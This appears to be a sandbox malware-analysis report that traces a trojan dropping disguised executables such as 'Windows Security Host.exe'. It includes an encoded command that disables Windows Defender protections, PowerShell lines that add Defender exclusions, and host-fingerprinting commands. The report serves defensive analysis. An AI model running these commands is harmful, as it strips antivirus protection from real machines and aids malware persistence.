                    Source: Injector.exe.0.dr, --.cs | Base64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
                    Source: Windows Security Host.exe.0.dr, ZtOQxII8taYVMyhy3X9kwlrA9X9tmCjo7UPt5IEWs7WYVJJoWwke81L.cs | Base64 encoded string: 'wZKGOVj0oK1WmVl4RudElUE2v9D7IqxYxEnmez9YUDoQ7O9LgtvAX5KliA4ipu1WzdmQviKu', 'zU1eOvlqjP1DLBOWCorJACQIjNb8U8kFKhcIqEr93EnP9aklUh6ZSdVb454VfiLkHNMr2uoM'
                    Source: Windows Security Host.exe.0.dr, 93i8Zo1wi4ZYxH3roBHmE8c8nVmT2SjfQf7xocVjRTeBtjREsbOy2e7.cs | Base64 encoded string: 'okwqvIEjQzKOk8BagkPbnWQFTkBMAGI99vUMxgMjLuhYwrr1Z3zBw3tGTQT4c28GDdtmnZta'
                    Source: Windows Security Host.exe.0.dr, hwmtv4f3DiHFPVZouaTyX8hlf0YqgEyb8O6Ad4mWdDWf1F52iddDM7M.cs | Base64 encoded string: 'pZRLVthbY0wQ7MSMASEnw0EIpoANL3qKFGi66kNRE4qKrQwuMj7LKFrE2On27oKv0hwf8h9U', 'XyfAXefG0Kk4Pw02K1FuWuZSMRVkT8xQdyWqglkuX0M9gaVRUo0B00TPF8fA3eXfPhhMQCD2'
                    Source: Windows Security Host.exe.0.dr, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.cs | Base64 encoded string: 'Ojt9FItRGmcrbt4UyWSDKUmXQQc9Ea87FtTYM0nIFgzz8zurwnKuoHwd8fiW4fMSJi3Bk14D', 'hYHtNinNtryAVaBm7VytQN6mqPDPPEEWBwXT17rL8PRMrYDamRFaRxE0qLMZfReE9DsmVlHM', 'RpYnm69xc87I9P92i883yZixJQJ1vJChMiErcTDPh0sXIqTpZT81dDSwe5W5VlceAqwAE0gO', 'pe8StOHh4McnflYjwDzL1eFDbJXAXj95bFSzK3YGfpRL0RvqDlqTrkG31uBIJSHe1l0ylSIk'
                    Source: Windows Security Host.exe.0.dr, DmCt5QxmGTm528ilqbeA2ahQPXHLzWVGTxW2HeINBuHBW3oaxRjxQ71.cs | Base64 encoded string: 'IQwbbYCWU67fN3ylVEfx4WsAIien7Bo78YxNt0GVKAKGPjroVxMW0icKP1hGWvvNElWjmtIT', 'mUXndKIpz3CbYv9cyg2rusJmAuZsDmaQhvASpNfaJCs6O6dn69BtBAsAJxriTN5aIqRV0DzU', 'PjHv9JVY4FEZ7U6EU5eJSmsrbjOXhiYYHP0Dm1wUmA4j3XgHfpUn2MTKLtP59GHn5fTU7D2F', 'ymGqTnrDYnOFwSTGYe3iovKTOEiHwJ5xIX9bbtKlFEHki11EirUOMbm1SQM9RLVQq6M6ym4K', 'o29D606xHCUkwCZz9mXstDimkuPMJLqFqhEeihYQODvA2UAaTOlO4LHwpP3cpzdg2mgJ6qu4', 'Q8yVhzT0wPmOXaF5hCoS6zHIcOMiGArL4pcK6NaEmG8EzkJEZU3U4R0HZMCZ4ny9pLDKABKs', 'Kmx5oZZhctj4O6lYf1MpGq2oOYUGhdi5vmv4CRHd96Qj30H0ERhXLwj9JnHh1v7yPg1WBe4g', 'KFZMiAvGOHG1qBkfQiPf6AaTOPcTUi64Lc4itaNSIoX9XsDDQsF39SGsqfI1IuKP9seQzz7x', 'OduhZg7H18ZXTTRN3gxWVeKFmD3tKhUq3NGKpd6FzJtstsC9bQY6weXJtjwbZh2ObbU5Ctag', 'PJNWfbB6lvFvuOygmn43F8C2hNidMlBD6vLG7ExHDht2k8S7pWpAgJPZN0YCo7FFDpUtT0Fu', 'kBx2RCVXH8E2oc2zHDMUcuERHmBGQyRdxnD3nfmf44j6pmRq0ZzbgcRwzrIuenHDOfUUiWoC', 'smFXrVQBmSjiFjJDLFr9boxB3dFjvcORNua4ih4JTPYb61Qx9WQSPSLyPowvq5gJ1DqcOuUk'
                    Source: Windows Security Host.exe.0.dr, pX49WTWreP6h38vcWNF06rYOS0B7DTfD16dfY5IqI76SjlXgINh7OKF.cs | Base64 encoded string: 'RIY883FdNWmPSXbXulDKaxdYKKDt6HdYrSN9dUjFhtyiMjE2q12cP68Qa7GiTdHwx1PZovA0', 'w1fdelXWbLN39qBod69MGbEAhOxpeOwv9uHGNRoGNDruXgnQmPGjdJ5dlzkFOIcKR4btuQiq', 'jCmTGLMV4M92d6JtW793NnloH7fhXY9zmNeUJewuJJFCPOarS5JLpS3ph3NLu6Bk1vF1RMzk', 'y5ML95ed1njyiry8zxfhvCD57xu3uIdJnlBeC9MiuQLTRrkDNG2lmEp88Iyw88IkmkNrUMiL'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, ZtOQxII8taYVMyhy3X9kwlrA9X9tmCjo7UPt5IEWs7WYVJJoWwke81L.cs | Base64 encoded string: 'wZKGOVj0oK1WmVl4RudElUE2v9D7IqxYxEnmez9YUDoQ7O9LgtvAX5KliA4ipu1WzdmQviKu', 'zU1eOvlqjP1DLBOWCorJACQIjNb8U8kFKhcIqEr93EnP9aklUh6ZSdVb454VfiLkHNMr2uoM'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, 93i8Zo1wi4ZYxH3roBHmE8c8nVmT2SjfQf7xocVjRTeBtjREsbOy2e7.cs | Base64 encoded string: 'okwqvIEjQzKOk8BagkPbnWQFTkBMAGI99vUMxgMjLuhYwrr1Z3zBw3tGTQT4c28GDdtmnZta'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, hwmtv4f3DiHFPVZouaTyX8hlf0YqgEyb8O6Ad4mWdDWf1F52iddDM7M.cs | Base64 encoded string: 'pZRLVthbY0wQ7MSMASEnw0EIpoANL3qKFGi66kNRE4qKrQwuMj7LKFrE2On27oKv0hwf8h9U', 'XyfAXefG0Kk4Pw02K1FuWuZSMRVkT8xQdyWqglkuX0M9gaVRUo0B00TPF8fA3eXfPhhMQCD2'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.cs | Base64 encoded string: 'Ojt9FItRGmcrbt4UyWSDKUmXQQc9Ea87FtTYM0nIFgzz8zurwnKuoHwd8fiW4fMSJi3Bk14D', 'hYHtNinNtryAVaBm7VytQN6mqPDPPEEWBwXT17rL8PRMrYDamRFaRxE0qLMZfReE9DsmVlHM', 'RpYnm69xc87I9P92i883yZixJQJ1vJChMiErcTDPh0sXIqTpZT81dDSwe5W5VlceAqwAE0gO', 'pe8StOHh4McnflYjwDzL1eFDbJXAXj95bFSzK3YGfpRL0RvqDlqTrkG31uBIJSHe1l0ylSIk'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, DmCt5QxmGTm528ilqbeA2ahQPXHLzWVGTxW2HeINBuHBW3oaxRjxQ71.cs | Base64 encoded string: 'IQwbbYCWU67fN3ylVEfx4WsAIien7Bo78YxNt0GVKAKGPjroVxMW0icKP1hGWvvNElWjmtIT', 'mUXndKIpz3CbYv9cyg2rusJmAuZsDmaQhvASpNfaJCs6O6dn69BtBAsAJxriTN5aIqRV0DzU', 'PjHv9JVY4FEZ7U6EU5eJSmsrbjOXhiYYHP0Dm1wUmA4j3XgHfpUn2MTKLtP59GHn5fTU7D2F', 'ymGqTnrDYnOFwSTGYe3iovKTOEiHwJ5xIX9bbtKlFEHki11EirUOMbm1SQM9RLVQq6M6ym4K', 'o29D606xHCUkwCZz9mXstDimkuPMJLqFqhEeihYQODvA2UAaTOlO4LHwpP3cpzdg2mgJ6qu4', 'Q8yVhzT0wPmOXaF5hCoS6zHIcOMiGArL4pcK6NaEmG8EzkJEZU3U4R0HZMCZ4ny9pLDKABKs', 'Kmx5oZZhctj4O6lYf1MpGq2oOYUGhdi5vmv4CRHd96Qj30H0ERhXLwj9JnHh1v7yPg1WBe4g', 'KFZMiAvGOHG1qBkfQiPf6AaTOPcTUi64Lc4itaNSIoX9XsDDQsF39SGsqfI1IuKP9seQzz7x', 'OduhZg7H18ZXTTRN3gxWVeKFmD3tKhUq3NGKpd6FzJtstsC9bQY6weXJtjwbZh2ObbU5Ctag', 'PJNWfbB6lvFvuOygmn43F8C2hNidMlBD6vLG7ExHDht2k8S7pWpAgJPZN0YCo7FFDpUtT0Fu', 'kBx2RCVXH8E2oc2zHDMUcuERHmBGQyRdxnD3nfmf44j6pmRq0ZzbgcRwzrIuenHDOfUUiWoC', 'smFXrVQBmSjiFjJDLFr9boxB3dFjvcORNua4ih4JTPYb61Qx9WQSPSLyPowvq5gJ1DqcOuUk'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, pX49WTWreP6h38vcWNF06rYOS0B7DTfD16dfY5IqI76SjlXgINh7OKF.cs | Base64 encoded string: 'RIY883FdNWmPSXbXulDKaxdYKKDt6HdYrSN9dUjFhtyiMjE2q12cP68Qa7GiTdHwx1PZovA0', 'w1fdelXWbLN39qBod69MGbEAhOxpeOwv9uHGNRoGNDruXgnQmPGjdJ5dlzkFOIcKR4btuQiq', 'jCmTGLMV4M92d6JtW793NnloH7fhXY9zmNeUJewuJJFCPOarS5JLpS3ph3NLu6Bk1vF1RMzk', 'y5ML95ed1njyiry8zxfhvCD57xu3uIdJnlBeC9MiuQLTRrkDNG2lmEp88Iyw88IkmkNrUMiL'
                    Source: Windows Security Host.exe.3.dr, ZtOQxII8taYVMyhy3X9kwlrA9X9tmCjo7UPt5IEWs7WYVJJoWwke81L.cs | Base64 encoded string: 'wZKGOVj0oK1WmVl4RudElUE2v9D7IqxYxEnmez9YUDoQ7O9LgtvAX5KliA4ipu1WzdmQviKu', 'zU1eOvlqjP1DLBOWCorJACQIjNb8U8kFKhcIqEr93EnP9aklUh6ZSdVb454VfiLkHNMr2uoM'
                    Source: Windows Security Host.exe.3.dr, 93i8Zo1wi4ZYxH3roBHmE8c8nVmT2SjfQf7xocVjRTeBtjREsbOy2e7.cs | Base64 encoded string: 'okwqvIEjQzKOk8BagkPbnWQFTkBMAGI99vUMxgMjLuhYwrr1Z3zBw3tGTQT4c28GDdtmnZta'
                    Source: Windows Security Host.exe.3.dr, hwmtv4f3DiHFPVZouaTyX8hlf0YqgEyb8O6Ad4mWdDWf1F52iddDM7M.cs | Base64 encoded string: 'pZRLVthbY0wQ7MSMASEnw0EIpoANL3qKFGi66kNRE4qKrQwuMj7LKFrE2On27oKv0hwf8h9U', 'XyfAXefG0Kk4Pw02K1FuWuZSMRVkT8xQdyWqglkuX0M9gaVRUo0B00TPF8fA3eXfPhhMQCD2'
                    Source: Windows Security Host.exe.3.dr, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.cs | Base64 encoded string: 'Ojt9FItRGmcrbt4UyWSDKUmXQQc9Ea87FtTYM0nIFgzz8zurwnKuoHwd8fiW4fMSJi3Bk14D', 'hYHtNinNtryAVaBm7VytQN6mqPDPPEEWBwXT17rL8PRMrYDamRFaRxE0qLMZfReE9DsmVlHM', 'RpYnm69xc87I9P92i883yZixJQJ1vJChMiErcTDPh0sXIqTpZT81dDSwe5W5VlceAqwAE0gO', 'pe8StOHh4McnflYjwDzL1eFDbJXAXj95bFSzK3YGfpRL0RvqDlqTrkG31uBIJSHe1l0ylSIk'
                    Source: Windows Security Host.exe.3.dr, DmCt5QxmGTm528ilqbeA2ahQPXHLzWVGTxW2HeINBuHBW3oaxRjxQ71.cs | Base64 encoded string: 'IQwbbYCWU67fN3ylVEfx4WsAIien7Bo78YxNt0GVKAKGPjroVxMW0icKP1hGWvvNElWjmtIT', 'mUXndKIpz3CbYv9cyg2rusJmAuZsDmaQhvASpNfaJCs6O6dn69BtBAsAJxriTN5aIqRV0DzU', 'PjHv9JVY4FEZ7U6EU5eJSmsrbjOXhiYYHP0Dm1wUmA4j3XgHfpUn2MTKLtP59GHn5fTU7D2F', 'ymGqTnrDYnOFwSTGYe3iovKTOEiHwJ5xIX9bbtKlFEHki11EirUOMbm1SQM9RLVQq6M6ym4K', 'o29D606xHCUkwCZz9mXstDimkuPMJLqFqhEeihYQODvA2UAaTOlO4LHwpP3cpzdg2mgJ6qu4', 'Q8yVhzT0wPmOXaF5hCoS6zHIcOMiGArL4pcK6NaEmG8EzkJEZU3U4R0HZMCZ4ny9pLDKABKs', 'Kmx5oZZhctj4O6lYf1MpGq2oOYUGhdi5vmv4CRHd96Qj30H0ERhXLwj9JnHh1v7yPg1WBe4g', 'KFZMiAvGOHG1qBkfQiPf6AaTOPcTUi64Lc4itaNSIoX9XsDDQsF39SGsqfI1IuKP9seQzz7x', 'OduhZg7H18ZXTTRN3gxWVeKFmD3tKhUq3NGKpd6FzJtstsC9bQY6weXJtjwbZh2ObbU5Ctag', 'PJNWfbB6lvFvuOygmn43F8C2hNidMlBD6vLG7ExHDht2k8S7pWpAgJPZN0YCo7FFDpUtT0Fu', 'kBx2RCVXH8E2oc2zHDMUcuERHmBGQyRdxnD3nfmf44j6pmRq0ZzbgcRwzrIuenHDOfUUiWoC', 'smFXrVQBmSjiFjJDLFr9boxB3dFjvcORNua4ih4JTPYb61Qx9WQSPSLyPowvq5gJ1DqcOuUk'
                    Source: Windows Security Host.exe.3.dr, pX49WTWreP6h38vcWNF06rYOS0B7DTfD16dfY5IqI76SjlXgINh7OKF.csBase64 encoded string: 'RIY883FdNWmPSXbXulDKaxdYKKDt6HdYrSN9dUjFhtyiMjE2q12cP68Qa7GiTdHwx1PZovA0', 'w1fdelXWbLN39qBod69MGbEAhOxpeOwv9uHGNRoGNDruXgnQmPGjdJ5dlzkFOIcKR4btuQiq', 'jCmTGLMV4M92d6JtW793NnloH7fhXY9zmNeUJewuJJFCPOarS5JLpS3ph3NLu6Bk1vF1RMzk', 'y5ML95ed1njyiry8zxfhvCD57xu3uIdJnlBeC9MiuQLTRrkDNG2lmEp88Iyw88IkmkNrUMiL'
Source: Windows Security Host.exe.3.dr, DmCt5QxmGTm528ilqbeA2ahQPXHLzWVGTxW2HeINBuHBW3oaxRjxQ71.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Windows Security Host.exe.3.dr, DmCt5QxmGTm528ilqbeA2ahQPXHLzWVGTxW2HeINBuHBW3oaxRjxQ71.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Windows Security Host.exe.0.dr, DmCt5QxmGTm528ilqbeA2ahQPXHLzWVGTxW2HeINBuHBW3oaxRjxQ71.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Windows Security Host.exe.0.dr, DmCt5QxmGTm528ilqbeA2ahQPXHLzWVGTxW2HeINBuHBW3oaxRjxQ71.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, DmCt5QxmGTm528ilqbeA2ahQPXHLzWVGTxW2HeINBuHBW3oaxRjxQ71.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, DmCt5QxmGTm528ilqbeA2ahQPXHLzWVGTxW2HeINBuHBW3oaxRjxQ71.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Injector.exe.0.dr, --.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Injector.exe.0.dr, --.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@31/33@5/6
Source: C:\Users\user\Desktop\8Hd0ZExgJz.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\8Hd0ZExgJz.exe.log
Source: C:\Users\user\Windows Security Host.exe | Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4064
Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe | Mutant created: \Sessions\1\BaseNamedObjects\6uSr6XBf6oxojH0b
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8164:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6356:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:120:WilError_03
Source: C:\Users\user\Desktop\8Hd0ZExgJz.exe | Mutant created: \Sessions\1\BaseNamedObjects\ObFXXBZjIkSdxNXuV
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4912:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7552:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\Injector.exe | Mutant created: \Sessions\1\BaseNamedObjects\BBp4iSYvtWnKX1LZyNnx
Source: C:\Users\user\Desktop\8Hd0ZExgJz.exe | File created: C:\Users\user\AppData\Local\Temp\Injector.exe
Source: 8Hd0ZExgJz.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 8Hd0ZExgJz.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\8Hd0ZExgJz.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\8Hd0ZExgJz.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 8Hd0ZExgJz.exe | ReversingLabs: Detection: 60%
Source: unknown | Process created: C:\Users\user\Desktop\8Hd0ZExgJz.exe "C:\Users\user\Desktop\8Hd0ZExgJz.exe"
Source: C:\Users\user\Desktop\8Hd0ZExgJz.exe | Process created: C:\Users\user\AppData\Local\Temp\Injector.exe "C:\Users\user~1\AppData\Local\Temp\Injector.exe"
Source: C:\Users\user\Desktop\8Hd0ZExgJz.exe | Process created: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe "C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe"
Source: C:\Users\user\Desktop\8Hd0ZExgJz.exe | Process created: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe "C:\Users\user~1\AppData\Local\Temp\BootstrapperV1.23.exe"
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe | Process created: C:\Windows\System32\cmd.exe "cmd" /c ipconfig /all
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Users\user\AppData\Local\Temp\Injector.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4064 -s 2188
Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Host.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Windows Security Host.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Host.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\Windows Security Host.exe "C:\Users\user\Windows Security Host.exe"
Source: unknown | Process created: C:\Users\user\Windows Security Host.exe "C:\Users\user\Windows Security Host.exe"
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: apphelp.dllJump to behavior
